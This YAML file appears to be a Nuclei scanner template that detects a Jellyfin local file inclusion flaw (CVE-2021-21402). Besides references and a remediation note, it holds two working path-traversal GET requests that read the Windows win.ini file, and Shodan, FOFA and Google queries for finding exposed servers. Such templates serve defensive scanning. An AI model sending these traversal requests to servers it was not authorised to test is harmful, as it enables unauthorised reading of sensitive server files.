64 lines
2.2 KiB
YAML
64 lines
2.2 KiB
YAML
id: CVE-2021-21402
|
|
|
|
info:
|
|
name: Jellyfin <10.7.0 - Local File Inclusion
|
|
author: dwisiswant0
|
|
severity: medium
|
|
description: |
|
|
Jellyfin before 10.7.0 is vulnerable to local file inclusion. This issue is more prevalent when Windows is used as the host OS. Servers exposed to public Internet are potentially at risk.
|
|
impact: |
|
|
Successful exploitation could allow an attacker to read sensitive files on the server.
|
|
remediation: This is fixed in version 10.7.1.
|
|
reference:
|
|
- https://securitylab.github.com/advisories/GHSL-2021-050-jellyfin/
|
|
- https://github.com/jellyfin/jellyfin/security/advisories/GHSA-wg4c-c9g9-rxhx
|
|
- https://github.com/jellyfin/jellyfin/releases/tag/v10.7.1
|
|
- https://github.com/jellyfin/jellyfin/commit/0183ef8e89195f420c48d2600bc0b72f6d3a7fd7
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-21402
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 6.5
|
|
cve-id: CVE-2021-21402
|
|
cwe-id: CWE-22
|
|
epss-score: 0.2223
|
|
epss-percentile: 0.96475
|
|
cpe: cpe:2.3:a:jellyfin:jellyfin:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 2
|
|
vendor: jellyfin
|
|
product: jellyfin
|
|
shodan-query:
|
|
- http.html:"Jellyfin"
|
|
- http.html:"jellyfin"
|
|
- http.title:"jellyfin"
|
|
fofa-query:
|
|
- title="Jellyfin" || body="http://jellyfin.media"
|
|
- title="jellyfin"
|
|
- body="jellyfin"
|
|
- title="jellyfin" || body="http://jellyfin.media"
|
|
google-query: intitle:"jellyfin"
|
|
tags: cve,cve2021,jellyfin,lfi
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Audio/1/hls/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
|
|
- "{{BaseURL}}/Videos/1/hls/m/..%5C..%5C..%5C..%5C..%5C..%5CWindows%5Cwin.ini/stream.mp3/"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "Content-Type: application/octet-stream"
|
|
|
|
- type: regex
|
|
part: body
|
|
regex:
|
|
- "\\[(font|extension|file)s\\]"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220407c3f5d2d9467fbde39aca1165e01df0db9da78b9a7d30a8b5894850972fa77022076e26f105ea3172b53180537cb1299cc5a089f3f94930b5faa8f226d54abb764:922c64590222798bb761d5b6d8e72950 |